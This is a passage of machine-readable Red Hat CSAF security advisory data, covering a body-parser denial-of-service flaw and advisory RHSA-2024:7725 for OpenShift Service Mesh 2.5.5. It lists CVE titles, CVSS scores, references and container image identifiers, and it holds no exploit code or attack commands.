"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024_7725
Vulnerability from csaf_redhat - Published: 2024-10-07 09:24 - Updated: 2024-12-18 04:38Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7725",
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5",
"tracking": {
"current_release_date": "2024-12-18T04:38:11+00:00",
"generator": {
"date": "2024-12-18T04:38:11+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:7725",
"initial_release_date": "2024-10-07T09:24:53+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:38:11+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.5 for RHEL 8",
"product": {
"name": "RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.5::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
